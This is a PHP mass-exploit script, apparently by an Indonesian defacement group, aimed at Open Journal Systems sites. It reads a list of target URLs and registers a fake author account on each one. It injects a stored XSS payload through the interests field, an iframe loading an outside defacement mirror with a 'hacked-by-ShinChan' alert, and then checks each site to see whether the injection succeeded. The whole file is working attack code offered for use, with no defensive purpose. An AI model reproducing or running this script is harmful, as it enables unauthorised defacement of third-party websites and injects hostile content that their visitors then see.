<?php
/*

Created: by ShinChan | N45HT | Indonesian People
Date: 24/10/2018
Fp : https://fb.com/ShinChan.admin
Mail: [email protected]

*/

function banner(){
	echo "
  ___  _  _  __  _  _  __  _  _   __   _  _
 / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( ) 
 \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (
 (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)
    OJS-Ajax-getInterests Auto Exploit!
   thanks: N45HT && All Indonesian h4x0r


";
}

$hack['username'] = "shinchan".rand(0,1945);
$hack['password'] = "th1s15myp455w0rd";
$hack['password2'] = "th1s15myp455w0rd";
$hack['firstName'] = "Shin";
$hack['lastName'] = "Chan";
$hack['email'] = "{$hack['username']}@shinch.an";
$hack['confirmEmail'] = "{$hack['username']}@shinch.an";
$hack['registerAsAuthor'] = 1;
$hack['interestsTextOnly'] = "<iframe src=https://mirror.hackersid.com/12066 width=100% height=900px onload=alert(`hacked-by-ShinChan`)><!--";

function exploit($target,$hack){
	$ch = curl_init("$target/index.php/index/user/registerUser");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $hack);
	$data = curl_exec($ch);
	curl_close($ch);
}

function check($target){
	$ch = curl_init("$target/index.php/index/user/getInterests");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
	$data = curl_exec($ch);
	curl_close($ch);
	if(preg_match("/hacked/",$data)){
		echo "  - Status: Success\n";
		echo "  - Result: $target/index.php/index/user/getInterests\n";
	}else{
		echo "  - Status: Failed\n";
	}
}

banner();
date_default_timezone_set("Asia/Jakarta");
if(isset($argv[1])){
	if(!file_exists($argv[1])){
		echo "File {$argv[1]} doesn't exist!";
	}else{
		$buka = fopen($argv[1],"r");
		$size = filesize($argv[1]);
		$baca = fread($buka,$size);
		$site = explode("\r\n",$baca);

		foreach($site as $sites){
			if(!preg_match("/^http:\/\//",$sites) AND !preg_match("/^https:\/\//",$sites)){
				$sites = "http://$sites";
			}else{
				$sites = $sites;
			}
			$parse = parse_url($sites);
			echo "[+] Starting at ".date("Y/m/d H:i:s")."\n";
			echo "[+] Exploiting {$parse['host']}";
			exploit($sites,$hack);
			echo "\n";
			check($sites);
			echo "[+] Closing at ".date("Y/m/d H:i:s")."\n\n";
		}
	}
}else{
	echo "Usage: php {$argv[0]} [list.txt]\n";
}